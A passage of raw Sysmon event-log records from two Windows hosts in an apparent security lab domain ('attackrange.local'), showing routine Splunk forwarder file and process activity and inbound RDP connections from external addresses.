354300x8000000000000000979652Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:44.163{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50299-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979651Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:43.933{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-50648-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979650Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:46.761{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30B883F2432B128838461BEAEF551956,SHA256=04CF255AABA36277423BFB14C7E43178C2852BB0EAC192CB185119A29D00D886,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.226{5EBD8912-8BC2-6151-507A-00000000FC01}25564332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.073{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFDDCDA9828B00B051DC6528177B7AFA,SHA256=716968000669F765EA6EC73CF54FA039F97324B9F59E7262953D6C306BB1B54A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BC2-6151-507A-00000000FC01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8BC2-6151-507A-00000000FC01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.057{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BC2-6151-507A-00000000FC01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.042{5EBD8912-8BC2-6151-507A-00000000FC01}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979654Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:47.870{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5C1145A56E646F96DF66E61BA67C42,SHA256=6B382CFDD65795CB5CBDB4C99AEC697DC87A9EE10BB53988D87C1F17E698FFAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:47.058{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FBAA1C685FAF0018FC2A8233084D395,SHA256=AAE1D323973CFC2C1B2D0AED0F9C2E65E674C9F77DECB589B3423AF63C4B1B14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:47.058{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C0DEA96CB2E83DC7EB6FC0C1784AA0F,SHA256=25D3D14DEAD4F9C796046BCE45E638B19E059F5B85DECBE838CFCE91AD19F0EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979655Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:48.886{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=589FB3D3B78E4A6EFDC8ACEF16B4E4BE,SHA256=5ED2AD5D6E2BD85C59C445863386FB1011B1ADFABBD008C06AB9948FF84F75E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:46.289{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com43800-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:48.241{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4584E2C608C38CEFE56A1DFDD9DCC896,SHA256=ADBF039B849A4C39F2357F5A9A8D3E4A31E8718AD477E0A235C5804CB1FC331F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:48.094{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84DD330143319B5E5D73809BA8C0779E,SHA256=1428D2613DA68CDB3205EA53A4E77649A93B964E17F859EEB5C2E4BC81F1F572,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979657Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:47.281{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52328-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979656Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:49.901{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C57EAD3662361861C6742342B0A946D,SHA256=06299B4DE9BBFF098825535830CC7FD4DDBC1A6F283B38894EF0A9161E8739DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:49.124{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FE156B6AFF093BD2053E15CE09F2EA8,SHA256=530E46796183DF28CF1B90223E1204165E4B3DAB4A3D44D546BFB2B8F37E86E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979659Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:50.917{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EE9C28A2A473EA3EE87E4A9148CEEC8,SHA256=1B49E80AEE0AD3EA839C3F4F31A577BF0B56BAA0FE800776C4DA697CB323B5B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:48.849{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53421-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:50.139{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7258321208BB65C6A98A3B479AE12308,SHA256=527D2544083DCD8AB47DAD6AC40365515267307B81B912924B2655CDCCA87390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979658Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:50.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAE0308D9EB8D3B5CC9F1F2E319CFD93,SHA256=80E473332DC8CBC920EFC45512B0C6780163B9159571A6A9D4E1B6B542AC0CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979660Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:51.933{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C9527CA719A586A254BBABF18AAE372,SHA256=BCC2BCDFEAD3878787C85EC604A95A3C43BBA476BF3BCDD40D7EE7503887CBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:51.158{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C297FB16808CF399852949DE836D0D16,SHA256=7EDDAC2CB85891FC680E891C8712F8E6A19CFA9C9F1F568E1FD62DDA301BCCDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979662Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:52.933{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C81314756A3A02039CE34A29310F3DE,SHA256=451867DCF5278A80074340C74A7A726016DA8AA48E1CCA561F1A8CF3F9AFE068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:52.197{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06F2DD5A8F3B82F13E291FDAD985F898,SHA256=A11FDA743D30BC34ECF3BB96A7F2B4A5BC337B4F72F417DB35F5E4535D5B6A64,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979661Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:48.839{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59432-false10.0.1.12-8000- 23542300x8000000000000000979663Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:53.948{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A9FA11E3664CCE079E81DE3B768F5AE,SHA256=426CE9F470CF6B697256690FEDFA29B96D47B5C0456230CB765D9BBC54D2986A,IMPHASH=00000000000000000000000000000000falsetrue 154100x80000000000000001050952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.974{5EBD8912-8BC9-6151-517A-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.377{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=095D51F3E02604570CB7CF7F9720E6CB,SHA256=B3A43C1805F63C3B3D0D793AB87F98218321AECE65CFD590F2265434CBACAF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.375{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=283295E064E5E253F7D7EF70400AB806,SHA256=C15B36620F41B32C88D7B2100CF2FCF513DB65483EE629D4F7220952EB8DE2D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:51.761{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60191-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.227{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5A9AED19F6787939DED3D641C454F5,SHA256=35454F847EB0BEBFE9F34D1495217121EA0747E02FD6F3B6BEFA37127CC22FC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979664Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:54.948{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58DB6E5201E5ABD8E3DA16EEDB078F9B,SHA256=C02678C94E1FA1CC897C10E5D3C570D61B3907CE57801DB09D54860CF9F1F2B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.994{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=095D51F3E02604570CB7CF7F9720E6CB,SHA256=B3A43C1805F63C3B3D0D793AB87F98218321AECE65CFD590F2265434CBACAF03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.826{5EBD8912-8BCA-6151-527A-00000000FC01}44524120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:54.641{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BCA-6151-527A-00000000FC01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 